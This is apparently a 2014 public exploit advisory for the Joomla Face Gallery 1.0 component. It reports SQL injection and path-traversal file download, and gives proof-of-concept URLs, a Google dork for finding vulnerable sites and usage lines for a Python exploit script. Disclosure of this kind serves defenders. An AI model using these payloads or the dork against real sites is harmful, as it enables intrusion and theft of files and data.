Joomla Face Gallery 1.0 Multiple Vulnerabilities

Joomla Face Gallery

######################

# Exploit Title : Joomla Face Gallery 1.0 Multiple Vulnerabilities

# Exploit Author : Claudio Viviani

# Vendor Homepage : https://www.apptha.com

# Software Link : https://www.apptha.com/downloadable/download/sample/sample_id/150

# Dork Google: inurl:option=com_facegallery

# Date : 2014-09-17

# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox

# Info:

# Joomla Face Gallery 1.0 suffers from SQL injection and Arbitrary file download vulnerabilities

# PoC Exploit:
#
# http://localhost/index.php?option=com_facegallery&view=images&aid=[SQLi]&lang=en
# http://localhost/index.php?option=com_facegallery&task=imageDownload&img_name=[../../filename]

# "aid" and "img_name" variables are not sanitized.

######################

Discovered By : Claudio Viviani
                http://www.homelab.it
        
                info@homelab.it
                homelabit@protonmail.ch

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################

Download

Download: j00ml4_face_gallery_10_afd.py 
          j00ml4_face_gallery_10_afd.py (Mega Mirror)

Exploit Usage

python j00ml4_face_gallery_10_afd.py -t http[s]://localhost[:PORT]
python j00ml4_face_gallery_10_afd.py -t http[s]://localhost/basedir[:PORT]